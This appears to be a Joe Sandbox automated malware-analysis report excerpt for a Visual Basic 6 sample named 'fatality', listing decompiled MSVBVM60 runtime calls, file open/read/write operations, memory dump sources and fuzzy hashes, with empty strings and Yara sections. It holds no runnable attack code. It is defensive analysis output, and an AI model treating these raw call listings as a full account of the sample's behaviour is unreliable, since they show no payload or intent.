                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 004139F6
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 00413A05
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413A18
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413A38
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00413A47
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413A76
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 00413AA7
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 00413AB6
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413AC9
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413AE9
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413B1A
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 00413B4F
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 00413B5E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413B75
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413B93
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406E00,00000000), ref: 00413BB0
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00413BBA
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00413BC6
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00413BD2
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00413C2A
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413C79
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413C91
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413CAD
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004074B4,00000000), ref: 00413CC2
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413CF5
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413D0D
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00413D29
                                                                                                                                                            • #537.MSVBVM60(?,?), ref: 00413D49
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?), ref: 00413D57
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,?), ref: 00413D5A
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?), ref: 00413D64
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?), ref: 00413D6C
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,?), ref: 00413DC0
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00413DCA
                                                                                                                                                            • #537.MSVBVM60(00000000), ref: 00413DCE
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60(00000008,?), ref: 00413E47
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,00000008,?), ref: 00413E72
                                                                                                                                                            • __vbaFpI4.MSVBVM60(?,00000008,?), ref: 00413EA0
                                                                                                                                                            • #606.MSVBVM60(00000000,?,00000008,?), ref: 00413EAD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413EB7
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00413EBA
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413EC4
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000008,?), ref: 00413ECC
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,00000008,?), ref: 00413ED8
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413EEA
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F02
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F1A
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F32
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F4A
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F62
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F7A
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413F92
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 00413FAA
                                                                                                                                                            • #606.MSVBVM60(00000002,00000008,?,00000008,?), ref: 00413FC9
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413FD3
                                                                                                                                                            • #537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 00413FD8
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413FE6
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00413FE9
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413FF3
                                                                                                                                                            • #537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 00413FF8
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414006
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414009
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414013
                                                                                                                                                            • #537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 00414018
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414026
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414029
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414033
                                                                                                                                                            • #537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 00414038
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414046
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414049
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414053
                                                                                                                                                            • #537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 00414058
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414066
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414069
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414073
                                                                                                                                                            • #537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 00414078
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414086
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414089
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414093
                                                                                                                                                            • #606.MSVBVM60(00000006,00000008,00000000,?,00000008,?), ref: 0041409F
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140A9
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004140AC
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140B6
                                                                                                                                                            • #581.MSVBVM60(&H68,00000000,?,00000008,?), ref: 004140BE
                                                                                                                                                            • __vbaFpI4.MSVBVM60(?,00000008,?), ref: 004140C4
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000008,?), ref: 004140CB
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140D9
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004140DC
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140E6
                                                                                                                                                            • #537.MSVBVM60(00000003,00000000,?,00000008,?), ref: 004140EB
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004140F9
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004140FC
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414106
                                                                                                                                                            • #606.MSVBVM60(00000002,00000008,00000000,?,00000008,?), ref: 00414112
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041411C
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041411F
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414129
                                                                                                                                                            • #537.MSVBVM60(00000016,00000000,?,00000008,?), ref: 0041412E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041413C
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041413F
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414149
                                                                                                                                                            • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 00414155
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041415F
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414162
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041416C
                                                                                                                                                            • #537.MSVBVM60(00000028,00000000,?,00000008,?), ref: 00414171
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041417F
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414182
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041418C
                                                                                                                                                            • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 00414198
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141A2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004141A5
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141AF
                                                                                                                                                            • #537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 004141B4
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141C2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004141C5
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141CF
                                                                                                                                                            • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 004141DB
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141E5
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004141E8
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004141F2
                                                                                                                                                            • #537.MSVBVM60(00000020,00000000,?,00000008,?), ref: 004141F7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414205
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414208
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414212
                                                                                                                                                            • #606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 0041421E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414228
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041422B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414235
                                                                                                                                                            • #537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 0041423A
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414248
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041424B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414255
                                                                                                                                                            • #537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 0041425A
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414268
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041426B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414275
                                                                                                                                                            • #537.MSVBVM60(00000018,00000000,?,00000008,?), ref: 0041427A
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414288
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0041428B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 00414295
                                                                                                                                                            • #606.MSVBVM60(00000005,00000008,00000000,?,00000008,?), ref: 004142A1
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142AB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004142AE
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142B8
                                                                                                                                                            • #537.MSVBVM60(00000040,00000000,?,00000008,?), ref: 004142BD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142CB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004142CE
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142D8
                                                                                                                                                            • #537.MSVBVM60(00000003,00000000,?,00000008,?), ref: 004142DD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142EB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004142EE
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142F8
                                                                                                                                                            • #606.MSVBVM60(00000012,00000008,00000000,?,00000008,?), ref: 00414304
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041430E
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414311
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041431B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000,?,00000008,?), ref: 00414325
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041432F
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000033,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414498
                                                                                                                                                            • __vbaFreeVarList.MSVBVM60(00000009,00000008,00000008,00000008,00000008,00000008,00000008,00000008,00000008,00000008,?,00000008,?), ref: 004144DF
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00414AEA
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00414AFC
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 00414B0E
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00414B18
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00414B20
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00414B2C
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00414B34
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00414B37
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00414B47
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,00414D6B,?,00000000), ref: 00414D44
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D53
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D58
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D60
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D68
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(?,00000000), ref: 00414D8A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Error$#537$BoundsGenerate$Free$#606CheckHresult$_adj_fdiv_m64$AnsiCopy$ListSystem$File$#581#648BstrCloseDestructExitOpenOverflowProcPut3RedimUnicode
                                                                                                                                                            • String ID: $&H68$&HA8$h#@
                                                                                                                                                            • API String ID: 3305104701-1988485601
                                                                                                                                                            • Opcode ID: cd20a7d3b55ef82ee3132964682ea25cd73d0367465c479d272536d82207a749
                                                                                                                                                            • Instruction ID: f198cd70f4d496bc7940f7355a5e4fe40ff025cce30350eb0c459dc764c5fff0
                                                                                                                                                            • Opcode Fuzzy Hash: cd20a7d3b55ef82ee3132964682ea25cd73d0367465c479d272536d82207a749
                                                                                                                                                            • Instruction Fuzzy Hash: A8130C71D002289BCB25DF65DD88BDEBBB9FB48301F1081EAE50AA6250DE745F85CF64
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(6CFA6537,00000000,00000000), ref: 004156CA
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004156D2
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 004156D6
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 004156EE
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 004156FD
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041570F
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00415719
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415721
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00415724
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00415734
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00415753
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00415769
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041576E
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00415782
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 00415789
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00415794
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415799
                                                                                                                                                            • __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 004157A3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004157B7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000003), ref: 004157C8
                                                                                                                                                            • #616.MSVBVM60(00000000), ref: 004157CB
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004157D6
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(?,00000000), ref: 004157DD
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 004157FF
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00415824
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000004,?), ref: 00415839
                                                                                                                                                            • #618.MSVBVM60(00000000), ref: 0041583C
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00415847
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0041584A
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000000), ref: 00415865
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000004,?,?,00000000,00000000), ref: 00415879
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041588E
                                                                                                                                                            • __vbaGet4.MSVBVM60(00000004,?,-00000005,00000000), ref: 00415898
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00415855
                                                                                                                                                              • Part of subcall function 0040EAB0: #594.MSVBVM60(?,6CEBD9F5,-00000001,6CEBD8B1), ref: 0040EB1A
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60 ref: 0040EB23
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaLenBstr.MSVBVM60 ref: 0040EB2F
                                                                                                                                                              • Part of subcall function 0040EAB0: #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
                                                                                                                                                              • Part of subcall function 0040EAB0: #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0000,?), ref: 004158D0
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004158DB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0000,?), ref: 004158EC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004158F7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00415907
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041590C
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415915
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000001,00000000), ref: 0041591A
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00415932
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00415941
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041594D
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00415957
                                                                                                                                                            • #525.MSVBVM60(00001000), ref: 00415962
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041596D
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004159A3
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004159AC
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004159B4
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004159BD
                                                                                                                                                            • #525.MSVBVM60(?), ref: 004159E9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004159F4
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004159F9
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00415A02
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415A0A
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00415A13
                                                                                                                                                            • #594.MSVBVM60(0000000A), ref: 00415A37
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00415A40
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,000000FF,00000000), ref: 00415A5C
                                                                                                                                                            • #593.MSVBVM60(0000000A), ref: 00415A86
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415AAF
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415ABD
                                                                                                                                                            • __vbaFpUI1.MSVBVM60 ref: 00415ADF
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00415AF7
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60 ref: 00415B1F
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415B6D
                                                                                                                                                            • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00415B79
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • #593.MSVBVM60(0000000A), ref: 00415BB3
                                                                                                                                                            • __vbaFpI4.MSVBVM60 ref: 00415BD5
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00415BE0
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60 ref: 00415BF4
                                                                                                                                                            • __vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00415C0C
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C17
                                                                                                                                                            • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00415C23
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C42
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000004,?,00000000), ref: 00415C51
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C55
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00415C5E
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C63
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00415C6C
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C70
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00415C73
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00415C7C
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,00415D0C), ref: 00415CE6
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415CF5
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415CFA
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415CFF
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415D04
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00415D28
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
